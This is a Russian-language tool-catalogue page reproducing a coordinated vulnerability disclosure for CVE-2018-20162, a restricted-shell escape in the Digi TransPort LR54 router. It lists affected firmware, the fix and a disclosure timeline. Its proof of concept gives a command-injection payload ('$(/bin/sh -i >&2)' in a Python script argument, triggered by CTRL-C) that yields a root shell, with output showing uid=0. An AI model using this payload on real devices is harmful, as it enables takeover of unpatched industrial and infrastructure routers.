Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape | Kitploit
Инструменты/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
Безопасность встроенных системПовышение привилегийБезопасность IoTАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность оборудования и IoTRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

Репозиторий
27 лет назадЕщё не проверено

layout: post title: "CVE-2018-20162: Digi TransPort LR54 Обход ограниченной оболочки" author: sgo category: security

Digi TransPort LR54 — это высокоскоростной LTE-маршрутизатор, обычно используемый в промышленности, инфраструктуре, розничной торговле и общественном транспорте.

Он поддерживает запуск Python-скриптов в ограниченной песочнице и имеет собственную оболочку, доступную по SSH, на которую распространяются те же ограничения. Следовательно, базовая ОС недоступна для администратора.

Я нашёл способ выйти из песочницы и получить root-оболочку, используя то, как CLI обрабатывает аргументы командной строки при выполнении Python- скриптов:

Когда интерактивный процесс Python получает SIGINT (через CTRL-C), аргументы скрипта не экранируются должным образом при передаче в обработчик журнала ошибок интерактивного CLI. Это позволяет атакующему выполнять произвольные команды от имени root.

Для эксплуатации этой уязвимости атакующему необходим интерактивный доступ к CLI с привилегиями 'super'. Пользователь с таким уровнем доступа включён по умолчанию на устройстве.

Уязвимые устройства

Digi Transport LR54 (и, возможно, связанные продукты, такие как WR64 и WR54)

Версия прошивки : 4.4.0.26 10/29/2018 21:14:06 Версия прошивки : 4.3.2.24 09/06/2018 00:58:34

И, возможно, более ранние версии

Устранение

Пользователям следует обновить прошивку до версии 4.5.1.4 или новее. Секреты, хранящиеся на устройстве, такие как приватные ключи и парольные фразы, следует сменить в качестве меры предосторожности.

Доказательство концепции

  1. Загрузите sleep.py на LR54 с помощью scp или sftp, содержащий:
root@kitploit:~
import time;time.sleep(10)
  1. Выполните следующую команду в CLI LR54:
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. Сразу после запуска программы нажмите CTRL-C

  2. После этого вы попадёте в интерактивную root-оболочку

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Хронология

  • 2018-12-13: Уязвимость обнаружена
  • 2018-12-14: Создан PoC, уведомлен вендор
  • 2018-12-14: Вендор подтвердил, 60-дневное эмбарго. Подана заявка на CVE.
  • 2018-12-15: Присвоен CVE-2018-20162
  • 2018-12-31: Получена предварительная прошивка. Подтверждено отсутствие уязвимости.
  • 2019-01-02: Вендор выпускает исправленную прошивку 4.5.1.4
  • 2019-01-25: Вендор обновил примечания к выпуску со ссылкой на CVE-2018-20162
  • 2019-02-13: Вендор одобрил раскрытие, эмбарго снято

Ссылки

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Благодарности

Уязвимость обнаружена Stig Palmquist.

Спасибо @duniel_pls и @alexanderkjall за проверку этого отчёта.

Скачать инструмент